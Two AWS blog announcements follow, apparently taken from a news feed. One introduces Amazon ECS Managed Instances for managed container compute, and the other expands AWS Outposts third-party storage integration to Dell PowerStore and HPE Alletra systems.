Amazon ECS Managed Instances provides a fully managed container compute environment that supports a broad range of EC2 instance types and deep integration with AWS services. By default, it automatically selects the most cost-optimized EC2 instances for your workloads, but you can specify particular instance attributes or types when needed. AWS handles all aspects of infrastructure management, including provisioning, scaling, security patching, and cost optimization, enabling you to concentrate on building and running your applications.

Let’s try it out

Looking at the AWS Management Console experience for creating a new Amazon ECS cluster, I can see the new option for using ECS Managed Instances. Let’s take a quick tour of all the new options.

Creating a ECS cluster with Managed Instances

After I’ve selected Fargate and Managed Instances, I’m presented with two options. If I select Use ECS default, Amazon ECS will choose general purpose instance types based on grouping together pending Tasks, and picking the optimum instance type based on cost and resilience metrics. This is the most straightforward and recommended way to get started. Selecting Use custom – advanced opens up additional configuration parameters, where I can fine-tune the attributes of instances Amazon ECS will use.

Creating a ECS cluster with Managed Instances

By default, I see CPU and Memory as attributes, but I can select from 20 additional attributes to continue to filter the list of available instance types Amazon ECS can access.

Creating a ECS cluster with Managed Instances

After I’ve made my attribute selections, I see a list of all the instance types that match my choices.

Creating a ECS cluster with Managed Instances

From here, I can create my ECS cluster as usual and Amazon ECS will provision instances for me on my behalf based on the attributes and criteria I’ve defined in the previous steps.

Key features of Amazon ECS Managed Instances

With Amazon ECS Managed Instances, AWS takes full responsibility for infrastructure management, handling all aspects of instance provisioning, scaling, and maintenance. This includes implementing regular security patches initiated every 14 days (due to instance connection draining, the actual lifetime of the instance may be longer), with the ability to schedule maintenance windows using Amazon EC2 event windows to minimize disruption to your applications.

The service provides exceptional flexibility in instance type selection. Although it automatically selects cost-optimized instance types by default, you maintain the power to specify desired instance attributes when your workloads require specific capabilities. This includes options for GPU acceleration, CPU architecture, and network performance requirements, giving you precise control over your compute environment.

To help optimize costs, Amazon ECS Managed Instances intelligently manages resource utilization by automatically placing multiple tasks on larger instances when appropriate. The service continually monitors and optimizes task placement, consolidating workloads onto fewer instances to dry up, utilize and terminate idle (empty) instances, providing both high availability and cost efficiency for your containerized applications.

Integration with existing AWS services is seamless, particularly with Amazon EC2 features such as EC2 pricing options. This deep integration means that you can maximize existing capacity investments while maintaining the operational simplicity of a fully managed service.

Security remains a top priority with Amazon ECS Managed Instances. The service runs on Bottlerocket, a purpose-built container operating system, and maintains your security posture through automated security patches and updates. You can see all the updates and patches applied to the Bottlerocket OS image on the Bottlerocket website. This comprehensive approach to security keeps your containerized applications running in a secure, maintained environment.

Available now

Amazon ECS Managed Instances is available today in US East (North Virginia), US West (Oregon), Europe (Dublin), Africa (Cape Town), Asia Pacific (Singapore), and Asia Pacific (Tokyo) AWS Regions. You can start using Managed Instances through the AWS Management Console, AWS Command Line Interface (AWS CLI), or infrastructure as code (IaC) tools such as AWS Cloud Development Kit (AWS CDK) and AWS CloudFormation. You pay for the EC2 instances you use plus a management fee for the service.

To learn more about Amazon ECS Managed Instances, visit the documentation and get started simplifying your container infrastructure today.

Announcing AWS Outposts third-party storage integration with Dell and HPE

This post was originally published on this site

Since announcing second-generation AWS Outposts racks in April with breakthrough performance and scalability, we’ve continued to innovate on behalf of our customers at the edge of the cloud. Today, we’re expanding AWS Outposts third-party storage integration program to include Dell PowerStore and HPE Alletra Storage MP B10000 systems, joining our list of existing integrations with NetApp on-premises enterprise storage arrays and Pure Storage FlashArray. This program makes it easy for customers to use AWS Outposts with third-party storage arrays through AWS native tooling. The solution integration is particularly important for organizations migrating VMware workloads to AWS who need to maintain their existing storage infrastructure during the transition, and for those who must meet strict data residency requirements by keeping their data on-premises while using AWS services.

Outposts compute rack_Gen2_front_45This announcement builds upon two significant storage integration milestones we achieved in the past year. In December 2024, we introduced the ability to attach block data volumes from third-party storage arrays to Amazon EC2 instances on Outposts directly through the AWS Management Console. Then in July 2025, we enabled booting Amazon EC2 instances directly from these external storage arrays. Now, with the addition of Dell and HPE, customers have even more choice in how they integrate their on-premises storage investments with AWS Outposts.

Enhanced storage integration capabilities

Our third-party storage integration supports both data and boot volumes, offering two boot methods: iSCSI SANboot and Localboot. The iSCSI SANboot option enables both read-only and read-write boot volumes, while Localboot supports read-only boot volumes using either iSCSI or NVMe-over-TCP protocols. With this comprehensive approach, customers can centrally manage their storage resources while maintaining the consistent hybrid experience that Outposts provides.

Through the Amazon EC2 Launch Instance Wizard in the AWS Management Console, customers can configure their instances to use external storage from any of our supported partners. For boot volumes, we provide AWS-verified AMIs for Windows Server 2022 and Red Hat Enterprise Linux 9, with automation scripts available through AWS Samples to simplify the setup process.

Support for various Outposts configurations

All third-party storage integration features are supported on Outposts 2U servers and both generations of Outposts racks. Support for second-generation Outposts racks means customers can combine the enhanced performance of our latest EC2 instances on Outposts—including twice the vCPU, memory, and network bandwidth—with their preferred storage solutions. The integration works seamlessly with both our new simplified network scaling capabilities and specialized Amazon EC2 instances designed for ultra-low latency and high throughput workloads.

Things to know

Customers can begin using these capabilities today with their existing Outposts deployments or when ordering new Outposts through the AWS Management Console. If you are using third-party storage integration with Outposts servers, you can have either your onsite personnel or a third-party IT provider install the servers for you. After the Outposts servers are connected to your network, AWS will remotely provision compute and storage resources so you can start launching applications. For Outposts rack deployments, the process involves a setup where AWS technicians verify site conditions and network connectivity before the rack installation and activation. Storage partners assist with the implementation of the third-party storage components.

Third-party storage integration for Outposts with all compatible storage vendors is available at no additional charge in all AWS Regions where Outposts is supported. See the FAQs for Outposts servers and Outposts racks for the latest list of supported Regions.

This expansion of our Outposts third-party storage integration program demonstrates our continued commitment to providing flexible, enterprise-grade hybrid cloud solutions, meeting customers where they are in their cloud migration journey. To learn more about this capability and our supported storage vendors, visit the AWS Outposts partner page and our technical documentation for Outposts servers, second-generation Outposts racks, and first-generation Outposts racks. To learn more about partner solutions, check out Dell PowerStore integration with AWS Outposts and HPE Alletra Storage MP B10000 integration with AWS Outposts.